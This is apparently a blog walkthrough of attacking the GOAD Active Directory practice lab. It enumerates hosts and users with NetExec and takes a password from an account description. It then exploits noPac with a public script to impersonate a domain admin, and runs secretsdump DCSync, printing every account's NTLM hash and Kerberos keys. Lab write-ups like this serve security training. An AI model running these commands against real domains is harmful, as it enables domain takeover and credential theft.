I came across a very good Active Directory pentest practice project online, GOAD (Game of Active Directory). I won't cover the lab setup here; let's get straight to the attack.
Information gathering

Scan

```bash
nxc smb 192.168.56.0/24
```
Three machines come back with signing:True. SMB signing is required by default on domain controllers, so from experience these three are the DCs. Signing can also be enforced on member servers through GPO, so it is worth confirming by scanning the LDAP port, which only DCs expose:

```bash
nxc ldap 192.168.56.0/24
```

Add these machines to the hosts file with their full FQDNs (for example winterfell.north.sevenkingdoms.local), since Kerberos ticket requests later on need the service principal names to resolve.
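As an added example (my own code, not part of the original post and not part of NetExec), here is a small Python parser for `nxc smb` scan lines that separates signing:True hosts (DC candidates, to be confirmed with `nxc ldap`) from signing:False hosts (NTLM relay targets) and generates the hosts-file entries Kerberos will need. The input is a constructed sample: the first two lines are the WINTERFELL and CASTELBLACK lines shown later in this post, the third is an invented line for a second domain, so the IP 192.168.56.10 and the name KINGSLANDING are assumptions.

```python
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Constructed sample. Lines 1 and 2 are copied from the scan output shown in
# this post; line 3 is invented (assumed IP and host name) so the hosts-file
# logic has a second domain to handle.
SAMPLE_NXC_OUTPUT = """\
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
"""

# One nxc smb banner line: protocol, ip, port, hostname, then the (key:value) fields.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+445\s+\S+\s+\[\*\].*?"
    r"\(name:(?P<name>[^)]+)\)\s+\(domain:(?P<domain>[^)]+)\)\s+"
    r"\(signing:(?P<signing>True|False)\)"
)


@dataclass(frozen=True)
class SmbHost:
    ip: str
    name: str
    domain: str
    signing: bool

    @property
    def fqdn(self) -> str:
        return f"{self.name.lower()}.{self.domain.lower()}"


def parse_nxc_smb(output: str) -> list[SmbHost]:
    """Parse nxc smb banner lines into SmbHost records, skipping anything else."""
    hosts = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hosts.append(SmbHost(m["ip"], m["name"], m["domain"], m["signing"] == "True"))
    return hosts


def dc_candidates(hosts: list[SmbHost]) -> list[SmbHost]:
    # Required signing is the DC default, but a member can enforce it via GPO,
    # so this is a candidate list to be confirmed with `nxc ldap`.
    return [h for h in hosts if h.signing]


def relay_targets(hosts: list[SmbHost]) -> list[SmbHost]:
    # Hosts that accept unsigned SMB sessions are NTLM relay targets.
    return [h for h in hosts if not h.signing]


def hosts_file_lines(hosts: list[SmbHost]) -> list[str]:
    """FQDN + short name per host, plus one bare-domain entry per domain.

    The bare domain name is pointed at the first signing:True host of that
    domain so that tools resolving the realm name reach a DC.
    """
    lines = [f"{h.ip} {h.fqdn} {h.name.lower()}" for h in hosts]
    seen: set[str] = set()
    for h in dc_candidates(hosts):
        dom = h.domain.lower()
        if dom not in seen:
            seen.add(dom)
            lines.append(f"{h.ip} {dom}")
    return lines


if __name__ == "__main__":
    # Usage: nxc smb 192.168.56.0/24 | python3 parse_scan.py   (or no stdin: runs the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NXC_OUTPUT
    found = parse_nxc_smb(text)
    print("# DC candidates:", ", ".join(h.fqdn for h in dc_candidates(found)))
    print("# relay targets:", ", ".join(h.fqdn for h in relay_targets(found)))
    print("\n".join(hosts_file_lines(found)))
```

The generated lines can be appended to /etc/hosts; the bare-domain entries are a convenience for tools that resolve the realm name rather than a specific DC.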
Finding domain accounts

When a DC allows anonymous (null-session) SMB access, domain accounts can be enumerated directly (if nothing comes back, try an explicit null session with `-u '' -p ''`):

```bash
nxc smb 192.168.56.0/24 --users
```

This hands us a username and password straight away (the password is sitting in the account's description field, which `--users` prints). A lab is a lab.

```
samwell.tarly:Heartsbane
```
Getting domain information

With a valid account we can bind to LDAP and pull much more information:

```
┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```
Unfortunately, the account we obtained is not in the Domain Admins group.
Attacking NORTH.SEVENKINGDOMS.LOCAL

So far we know of two machines in the NORTH.SEVENKINGDOMS.LOCAL domain:

```
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
```
According to the ldapdomaindump data there are two domain admins:

```
eddard.stark
Administrator
```

And we hold one domain user's credentials:

```
samwell.tarly:Heartsbane
```
Once we have a domain account we can scan for domain privilege-escalation vulnerabilities such as noPac (CVE-2021-42278 / CVE-2021-42287, sAMAccountName spoofing plus PAC confusion) and PrintNightmare (CVE-2021-34527).

NetExec can run both checks in one pass. Note that the spooler module only tells you the Print Spooler service is reachable on the DC, not whether the host is actually unpatched; the nopac module does a real check by requesting a TGT with and without a PAC and comparing their sizes, which a patched DC no longer allows:

```
┌──(kali㉿kali)-[~/Downloads/krbrelayx-master]
└─$ nxc smb 192.168.56.11 -u samwell.tarly -p Heartsbane -M nopac -M spooler
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
NOPAC       192.168.56.11   445    WINTERFELL       TGT with PAC size 1654
NOPAC       192.168.56.11   445    WINTERFELL       TGT without PAC size 817
NOPAC       192.168.56.11   445    WINTERFELL
NOPAC       192.168.56.11   445    WINTERFELL       VULNERABLE
NOPAC       192.168.56.11   445    WINTERFELL       Next step: https://github.com/Ridter/noPac
SPOOLER     192.168.56.11   445    WINTERFELL       Spooler service enabled
```
We can go straight to https://github.com/Ridter/noPac:

```
┌──(noPac)─(kali㉿kali)-[~/Downloads/noPac]
└─$ python3 noPac.py north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target winterfell.north.sevenkingdoms.local
[*] Total Domain Admins 3
[*] will try to impersonate eddard.stark
[*] Adding Computer Account "WIN-SXKFGMHCLVY$"
[*] MachineAccount "WIN-SXKFGMHCLVY$" password = 19EqF0n0imc2
[*] Successfully added machine account WIN-SXKFGMHCLVY$ with password 19EqF0n0imc2.
[*] WIN-SXKFGMHCLVY$ object = CN=WIN-SXKFGMHCLVY,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
[*] WIN-SXKFGMHCLVY$ sAMAccountName == winterfell
[*] Saving a DC's ticket in winterfell.ccache
[*] Reseting the machine account to WIN-SXKFGMHCLVY$
[*] Restored WIN-SXKFGMHCLVY$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating eddard.stark
[*] Requesting S4U2self
[*] Saving a user's ticket in eddard.stark.ccache
[*] Rename ccache to eddard.stark_winterfell.north.sevenkingdoms.local.ccache
[*] Attempting to del a computer with the name: WIN-SXKFGMHCLVY$
[-] Delete computer WIN-SXKFGMHCLVY$ Failed! Maybe the current user does not have permission.
```
The tool reports that deleting the machine account failed. That is expected: an account created through the MachineAccountQuota cannot be deleted by the low-privileged user that created it. It does not matter right now, the ticket is what we wanted, but WIN-SXKFGMHCLVY$ is now sitting in CN=Computers and must be cleaned up later.

Now point secretsdump at the ticket (via KRB5CCNAME) and dump the domain. With -just-dc it replicates the secrets over DRSUAPI (DCSync), which works because the impersonated eddard.stark is a domain admin and therefore has replication rights:
```
┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ ls -lian eddard.stark_winterfell.north.sevenkingdoms.local.ccache
3689526 -rw-rw-r-- 1 1000 1000 1545 Dec 20 10:03 eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ export KRB5CCNAME=eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ impacket-secretsdump -k -no-pass eddard.stark@winterfell.north.sevenkingdoms.local -just-dc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1afc3352b8464b283bc168d3dd935c78:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
north.sevenkingdoms.local\admin01:1125:aad3b435b51404eeaad3b435b51404ee:ebdf1f3a95ab808bbf01ecec1ebdc7ee:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:019b67b6b314f318bda1fcdf56fdec45:::
CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:3a5c1723373cbe24b801b1cfecf6cec7:::
DESKTOP-HKO7PPDH$:1122:aad3b435b51404eeaad3b435b51404ee:05c7bca85e213cdea0ce9fc93a5c5952:::
krbrelay$:1123:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
win11$:1124:aad3b435b51404eeaad3b435b51404ee:106d6be7c86c1248e9f29410bf52891d:::
Test123$:1126:aad3b435b51404eeaad3b435b51404ee:4b130d040e6349f2813703bb671fef45:::
Test234$:1127:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
Test456$:1128:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
cd1234..$:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-SXKFGMHCLVY$:1131:aad3b435b51404eeaad3b435b51404ee:079b73f9d179047c70481513e24a60b1:::
SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:34831d00299c3d29c2e48fa7444afe8d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:2b2a02d222c517711baf01c1254a00ada695fd849fc8f0e92210587e10e257aa
krbtgt:aes128-cts-hmac-sha1-96:7a2021c885bcfc796aa694921c5a8b4a
krbtgt:des-cbc-md5:944032f875df7576
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed
sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392
sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
north.sevenkingdoms.local\admin01:aes256-cts-hmac-sha1-96:932317d6c409d624aea9f223a3d47ec9042b4e7d0bc856324e918189ccf33c97
north.sevenkingdoms.local\admin01:aes128-cts-hmac-sha1-96:6fa2d0782fe5a9a8946acdc34779b905
north.sevenkingdoms.local\admin01:des-cbc-md5:bab51aeca1ec1ca7
WINTERFELL$:aes256-cts-hmac-sha1-96:9f46dd231e24cd29a4fb9c92cc4bfb52ac90c4afedad4527ca3b3b879b9682b2
WINTERFELL$:aes128-cts-hmac-sha1-96:528ed5d9308e2a82a0d68748cb5d6c81
WINTERFELL$:des-cbc-md5:7ff72c75d5d683b5
CASTELBLACK$:aes256-cts-hmac-sha1-96:6f5423d17fd317a6bec4cfb0fe0872bfc43597cb622351b9c8ccfeca38d3be62
CASTELBLACK$:aes128-cts-hmac-sha1-96:ccdacc849a0c9800078212adb3f6f851
CASTELBLACK$:des-cbc-md5:6e68a4a19454349b
DESKTOP-HKO7PPDH$:aes256-cts-hmac-sha1-96:86c358a1374a7734c9da842e359e3fae878e7fcbe68ba40cf9dc61a399842f51
DESKTOP-HKO7PPDH$:aes128-cts-hmac-sha1-96:b4df35e06ffe272af05bf23c130d8d07
DESKTOP-HKO7PPDH$:des-cbc-md5:687c19cdaba49132
krbrelay$:aes256-cts-hmac-sha1-96:9b24562bed8ff22f72ddb14c597c74889100ce2b84749a396b4af47876be2f7f
krbrelay$:aes128-cts-hmac-sha1-96:513eabc0aa30a686a2e5fb4b937615ef
krbrelay$:des-cbc-md5:aec4043738c7e38c
win11$:aes256-cts-hmac-sha1-96:1a0872d983af4250b4eac66af59fdb3c57a35ccd1967420228810c526a35915e
win11$:aes128-cts-hmac-sha1-96:221795e2c6278e258edcb2750355adc5
win11$:des-cbc-md5:04fea88c9419a432
Test123$:aes256-cts-hmac-sha1-96:ddec45e9ba6aa0c87f5bfe1f732eda7bb66c97486beb7c69b0cfb8cddeef28ee
Test123$:aes128-cts-hmac-sha1-96:6341bf5ed96823f7d39af437c07a2e92
Test123$:des-cbc-md5:e07a4adc325d2c9e
Test234$:aes256-cts-hmac-sha1-96:f8746b95c42047051fa169f81b58ec88e1f8aac60dfe2c58cecab09b116ca32f
Test234$:aes128-cts-hmac-sha1-96:5114a367c629151d9e92c70ef2a74ecc
Test234$:des-cbc-md5:97d686b997920bdc
Test456$:aes256-cts-hmac-sha1-96:0cf0c36a22200e0c87471cfc84b4c2ca3b2824d49af6c8bcc271e10b77acb653
Test456$:aes128-cts-hmac-sha1-96:707002b94973e6a27446b574a09fa4c4
Test456$:des-cbc-md5:5bd6d319d5b0524a
WIN-SXKFGMHCLVY$:aes256-cts-hmac-sha1-96:9116d96c8434751c276e7201cd20bad12794d60eedb700f036b3bc259d1cbb5f
WIN-SXKFGMHCLVY$:aes128-cts-hmac-sha1-96:35f20ca5201ec3b910164ea74b0628cc
WIN-SXKFGMHCLVY$:des-cbc-md5:1f324697b66e7f3e
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:b06b661d4b02880e55e846888400f36a46c37b492baf9fca43c181498b0081cc
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:bc137e4170c0c00794c618de0606988e
SEVENKINGDOMS$:des-cbc-md5:f483da8651026b86
[*] Cleaning up...
```
With the Administrator hash in hand we can now delete the machine account we registered (for example with impacket-addcomputer -delete -computer-name 'WIN-SXKFGMHCLVY$' and -hashes :<Administrator NT hash>); I won't go into that here.